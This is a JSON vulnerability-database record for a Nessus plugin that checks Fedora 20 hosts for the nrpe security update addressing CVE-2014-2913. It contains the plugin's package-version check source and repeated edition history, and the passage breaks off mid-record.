{"id": "FEDORA_2014-5897.NASL", "bulletinFamily": "scanner", "title": "Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)", "description": "Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "published": "2014-11-20T00:00:00", "modified": "2015-10-19T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "https://www.tenable.com/plugins/index.php?view=single&id=79346", "reporter": "Tenable", "references": ["http://www.nessus.org/u?13795117", "https://bugzilla.redhat.com/show_bug.cgi?id=1089878"], "cvelist": ["CVE-2014-2913"], "type": "nessus", "lastseen": "2019-02-21T01:22:50", "history": [{"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:nrpe"], "cvelist": ["CVE-2014-2913"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 3, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "947e25269c4281915105bedea79675b81615d8fe7dd5e93a8ae7a2a513c2cef9", "hashmap": [{"hash": "f43fde25caf6a2a838a85e41eb9158dd", "key": "references"}, {"hash": "57030998dbf24cdc7c9a14b101c40e97", "key": "cpe"}, {"hash": "4f68e485747d6888e3cdf7a78eef798c", "key": "pluginID"}, {"hash": "b733fbefa3f6c0732250b689cea72888", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "2650b552e6a3dacd1de9893c7ec853fa", "key": "title"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "88c725539d614055130db5977db76466", "key": "href"}, {"hash": "b0e03d2bc131e4ba82b59310377f2b51", "key": "description"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3d8d71ec757394472b6c007e6438a87b", "key": "sourceData"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "e1915c9da670387350f800c5b325e9f2", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79346", "id": "FEDORA_2014-5897.NASL", "lastseen": "2018-08-30T19:57:51", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "79346", "published": "2014-11-20T00:00:00", "references": ["http://www.nessus.org/u?13795117", "https://bugzilla.redhat.com/show_bug.cgi?id=1089878"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5897.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79346);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:19 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"FEDORA\", value:\"2014-5897\");\n\n script_name(english:\"Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089878\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144631.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13795117\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"nrpe-2.15-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "title": "Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)", "type": "nessus", "viewCount": 3}, "differentElements": ["cvss"], "edition": 3, "lastseen": "2018-08-30T19:57:51"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": [], "cvelist": ["CVE-2014-2913"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 1, "enchantments": {}, "hash": "295311422bb362e1698067101bd7ed0cf515638afe0f580758550f9867e2dcde", "hashmap": [{"hash": "f43fde25caf6a2a838a85e41eb9158dd", "key": "references"}, {"hash": "4f68e485747d6888e3cdf7a78eef798c", "key": "pluginID"}, {"hash": "b733fbefa3f6c0732250b689cea72888", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2650b552e6a3dacd1de9893c7ec853fa", "key": "title"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "88c725539d614055130db5977db76466", "key": "href"}, {"hash": "b0e03d2bc131e4ba82b59310377f2b51", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3d8d71ec757394472b6c007e6438a87b", "key": "sourceData"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "e1915c9da670387350f800c5b325e9f2", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79346", "id": "FEDORA_2014-5897.NASL", "lastseen": "2016-09-26T17:26:39", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.2", "pluginID": "79346", "published": "2014-11-20T00:00:00", "references": ["http://www.nessus.org/u?13795117", "https://bugzilla.redhat.com/show_bug.cgi?id=1089878"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5897.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79346);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:19 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"FEDORA\", value:\"2014-5897\");\n\n script_name(english:\"Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089878\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144631.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13795117\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"nrpe-2.15-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "title": "Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)", "type": "nessus", "viewCount": 3}, "differentElements": ["cpe"], "edition": 1, "lastseen": "2016-09-26T17:26:39"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:nrpe"], "cvelist": ["CVE-2014-2913"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 4, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "56982e83019e84e363dfbeabd121f284a9f186cbf699b679134172a95c36b5d6", "hashmap": [{"hash": "f43fde25caf6a2a838a85e41eb9158dd", "key": "references"}, {"hash": "57030998dbf24cdc7c9a14b101c40e97", "key": "cpe"}, {"hash": "4f68e485747d6888e3cdf7a78eef798c", "key": "pluginID"}, {"hash": "b733fbefa3f6c0732250b689cea72888", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2650b552e6a3dacd1de9893c7ec853fa", "key": "title"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "88c725539d614055130db5977db76466", "key": "href"}, {"hash": "b0e03d2bc131e4ba82b59310377f2b51", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3d8d71ec757394472b6c007e6438a87b", "key": "sourceData"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "e1915c9da670387350f800c5b325e9f2", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79346", "id": "FEDORA_2014-5897.NASL", "lastseen": "2018-09-02T00:09:41", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "79346", "published": "2014-11-20T00:00:00", "references": ["http://www.nessus.org/u?13795117", "https://bugzilla.redhat.com/show_bug.cgi?id=1089878"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5897.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79346);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:19 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"FEDORA\", value:\"2014-5897\");\n\n script_name(english:\"Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089878\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144631.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13795117\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"nrpe-2.15-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "title": "Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)", "type": "nessus", "viewCount": 3}, "differentElements": ["description"], "edition": 4, "lastseen": "2018-09-02T00:09:41"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:nrpe"], "cvelist": ["CVE-2014-2913"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "edition": 2, "enchantments": {"score": {"value": 5.0, "vector": "NONE"}}, "hash": "56982e83019e84e363dfbeabd121f284a9f186cbf699b679134172a95c36b5d6", "hashmap": [{"hash": "f43fde25caf6a2a838a85e41eb9158dd", "key": "references"}, {"hash": "57030998dbf24cdc7c9a14b101c40e97", "key": "cpe"}, {"hash": "4f68e485747d6888e3cdf7a78eef798c", "key": "pluginID"}, {"hash": "b733fbefa3f6c0732250b689cea72888", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2650b552e6a3dacd1de9893c7ec853fa", "key": "title"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "88c725539d614055130db5977db76466", "key": "href"}, {"hash": "b0e03d2bc131e4ba82b59310377f2b51", "key": "description"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3d8d71ec757394472b6c007e6438a87b", "key": "sourceData"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "e1915c9da670387350f800c5b325e9f2", "key": "published"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79346", "id": "FEDORA_2014-5897.NASL", "lastseen": "2017-10-29T13:45:36", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "79346", "published": "2014-11-20T00:00:00", "references": ["http://www.nessus.org/u?13795117", "https://bugzilla.redhat.com/show_bug.cgi?id=1089878"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5897.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79346);\n script_version(\"$Revision: 1.3 $\");\n script_cvs_date(\"$Date: 2015/10/19 22:32:19 $\");\n\n script_cve_id(\"CVE-2014-2913\");\n script_bugtraq_id(66969);\n script_xref(name:\"FEDORA\", value:\"2014-5897\");\n\n script_name(english:\"Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1089878\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-November/144631.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?13795117\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nrpe package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:U/RC:ND\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nrpe\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/20\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2015 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"nrpe-2.15-2.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nrpe\");\n}\n", "title": "Fedora 20 : nrpe-2.15-2.fc20 (2014-5897)", "type": "nessus", "viewCount": 3}, "differentElements": ["cvss"], "edition": 2, "lastseen": "2017-10-29T13:45:36"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/o:fedoraproject:fedora:20", "p-cpe:/a:fedoraproject:fedora:nrpe"], "cvelist": ["CVE-2014-2913"], "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "description": "Add patch to mitigate CVE-2014-2913\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 5, "enchantments": {"dependencies": {"modified": "2019-01-16T20:20:14", "references": [{"idList": ["ALAS-2014-364"], "type": "amazon"}, {"idList": ["SSV:87224"], "type": "seebug"}, {"idList": ["CVE-2014-2913"], "type": "cve"}, {"idList": ["PACKETSTORM:128038"], "type": "packetstorm"}, {"idList": ["GENTOO_GLSA-201408-18.NASL", "ALA_ALAS-2014-364.NASL", "NAGIOS_NRPE_COMMAND_ARGUMENT_PROCESSING.NASL", "SUSE_11_NAGIOS-NRPE-140507.NASL", "FEDORA_2014-5896.NASL", "OPENSUSE-2014-335.NASL", "FEDORA_2015-15398.NASL", "SUSE_11_NAGIOS-NRPE-140506.NASL"], "type": "nessus"}, {"idList": ["EDB-ID:34461", "EDB-ID:32925"], "type": "exploitdb"}, {"idList": ["GLSA-201408-18"], "type": "gentoo"}, {"idList": ["OPENVAS:1361412562310120139", "OPENVAS:1361412562310850793", "OPENVAS:1361412562310868498", "OPENVAS:1361412562310121262", "OPENVAS:1361412562310868557"], "type": "openvas"}, {"idList": ["SUSE-SU-2014:0682-1"], "type": "suse"}, {"idList": ["1337DAY-ID-22565"], "type": "zdt"}]}, "score": {"value": 5.0, "vector": "NONE"}}, "hash": "89cdc38688a32035287e62be920187e5146929c0c08676a1ae11f7d64ffa5ccc", "hashmap": [{"hash": "f43fde25caf6a2a838a85e41eb9158dd", "key": "references"}, {"hash": "57030998dbf24cdc7c9a14b101c40e97", "key": "cpe"}, {"hash": "4f68e485747d6888e3cdf7a78eef798c", "key": "pluginID"}, {"hash": "b733fbefa3f6c0732250b689cea72888", "key": "cvelist"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "e5d275b3ebd62646b78320753699e02e", "key": "cvss"}, {"hash": "2650b552e6a3dacd1de9893c7ec853fa", "key": "title"}, {"hash": "9a00910eeedb8c835c4637a953896665", "key": "modified"}, {"hash": "88c725539d614055130db5977db76466", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "3d8d71ec757394472b6c007e6438a87b", "key": "sourceData"}, {"hash": "be931514784f88df80712740ad2723e7", "key": "naslFamily"}, {"hash": "e1915c9da670387350f800c5b325e9f2", "key": "published"}, {"hash": "6bf0d50c08081abfa6b99b92469bc518", "key": "description"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=79346", "id": "FEDORA_2014-5897.NASL", "lastseen": "2019-01-16T20:20:14", "modified": "2015-10-19T00:00:00", "naslFamily": "Fedora Local Security Checks", "objectVersion": "1.3", "pluginID": "79346", "published": "2014-11-20T00:00:00", "references": ["http://www.nessus.org/u?13795117", "https://bugzilla.redhat.com/show_bug.cgi?id=1089878"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-5897.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(79346);\n 